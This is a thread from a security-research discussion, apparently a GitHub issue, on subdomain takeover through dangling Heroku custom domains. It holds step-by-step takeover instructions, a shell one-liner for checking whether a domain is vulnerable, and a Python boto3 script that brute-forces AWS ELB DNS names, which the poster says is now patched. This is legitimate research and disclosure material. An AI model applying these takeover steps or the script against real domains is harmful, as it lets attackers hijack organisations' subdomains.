Heroku proofs

[PatrikHudak]

Service name

Heroku

Proof

Heroku has same virtual hosting concept as other cloud providers. Various *.herokudns.com subdomain respond with the same set of A records. HTTP Host matters for correct domain resolution (as in other providers). There is also an possibility to upload own certificate in order to work on custom domain as well (e.g. GitHub Pages doesn't support this and thus you cannot have HTTPS enabled with custom domain set).

Step-by-step:

1. Open new Heroku app.
2. Choose name and region (no effect on takeover).
3. Push PoC application using git to Heroku. The process is described in Deploy tab.
4. Switch to Settings tab.
5. Scroll to Domains and certificates.
6. Click Add domain.
7. Provide the domain name you want to takeover, click Save changes.
8. It might take some time for settings to propagate.

To verify:

http -b GET http://{DOMAIN NAME} | grep -F -q "//www.herokucdn.com/error-pages/no-such-app.html" && echo "Subdomain takeover may be possible" || echo "Subdomain takeover is not possible"

(there is an iFrame with aforementioned URL present)

Documentation

There are three domains that Heroku uses:

• *.herokudns.com
• *.herokuapp.com
• *.herokussl.com

At the moment, I can confirm only proper working on herokudns.com. IIRC, herokuapp.com is a domain that was used prior and is now deprecated, however old DNS records still work. I would like to hear more in comments from somebody who has experience with the remaining two.

[PatrikHudak]

Official Heroku docs: https://devcenter.heroku.com/articles/custom-domains

[mshassy]

Can someone clarify with *.herokudns.com right now? When I add a custom domain the DNS record is fully randomized. Something like larval-beet.y987yas98yd98ya9yhd.herokudns.com
It used to be www.domain.com.herokudns.com like 2 days ago
@PatrikHudak @EdOverflow

[dropocol]

@mshassy it is randomized now. Just confirmed it.

[mshassy]

@dropocol Thanks a lot for the clarification. I was soo lucky to do a takeover two days. Just found another one and BAM! they have put mitigations. Good move by Heroku anyway.

[dropocol]

@mshassy Correct me if I am wrong but this means that the domain takeovers aren't possible any more?

[mshassy]

@dropocol Technically you still can. If the domain admin decides to use *.herokuapp.com which is not randomized yet. But both *.herokudns.com and *.herokussl.com are not vulnerable.

[codingo]

@mshassy What's the extent of this randomisation? These can often be defeated with a python script if the randomisation is somewhat predictable / basic (Amazon ELB's being a good example of this).

[mshassy]

@codingo
oncave-bastion-olhqn7oqox74kixnwxpsyxkv.herokudns.com
introductory-chimpanzee-vpgvjaxri1ntnuoda6f03jqy.herokudns.com
fundamental-meerkat-dzdijagwzkou8z2ansfnmpsk.herokudns.com

3 back to back instances where I tried to add the same domain.
Now it's fully randomized as you can see. I'm not sure whether it's possible to brute force such.

But it's strange that there is no info in their documentation about such change.
https://devcenter.heroku.com/articles/custom-domains
https://help.heroku.com/VKRNVVF5/what-is-the-correct-dns-cname-target-for-my-custom-domains

Btw this is off topic but I would be glad if you could tell us more about the ELB brute forcing. Does it mean that ELB takeovers are possible? I'm not too sure about this statement.

[staaldraad]

The change was activated on the 16th of October and recorded in the Heroku changelog: https://devcenter.heroku.com/changelog-items/1488

The devcenter documentation has not been updated yet, but should be before too long.

[bluedangerforyou]

If the company uses wild card ".domain.com then you cannot take it over because they "claim" all subdomains

[sagi]

@codingo can you please elaborate more about Amazon's ELB's cnames are appended a somewhat predictable integer? My trials with AWS's Load Balancer API seem to indicate uniformly distributed values.

[codingo]

@sagi these now look to be patched but for a period of time you could brute force them. Example PoC from when it was working below:

import boto3
import argparse
import time
client = boto3.client('elb', 'eu-central-1')



def takeover(elb,dns,flag):
    while (flag):
        time.sleep(2)
        response = client.create_load_balancer(
            Listeners=[
            {
                'InstancePort': 80,
                'InstanceProtocol': 'HTTP',
                'LoadBalancerPort': 80,
                'Protocol': 'HTTP',
            },
            ],
            LoadBalancerName=elb,
            SecurityGroups=[
               'sg-ead50686',
            ],
            Subnets=[
               'subnet-e7a9559c',
            ],
            )

        print(response['DNSName'])
        if response['DNSName'] == dns :
            flag=0
            print "DOMAIN TAKEN OVER"
            exit (0)
        else:
            response = client.delete_load_balancer(
                 LoadBalancerName=elb
               )


def main():
    parser = argparse.ArgumentParser(description='This script is for taking over ELB-SUBDOMAINS specifically eu-central-1')
    parser.add_argument('-elb', '--load_balancer', required=True)
    parser.add_argument('-dns', '--domain_name', required=True)
    args = parser.parse_args()
    takeover(args.load_balancer, args.domain_name,1)


if __name__ == '__main__':
    main()

Happy to elaborate further if you DM me on twitter.

[sagi]

@codingo Thanks!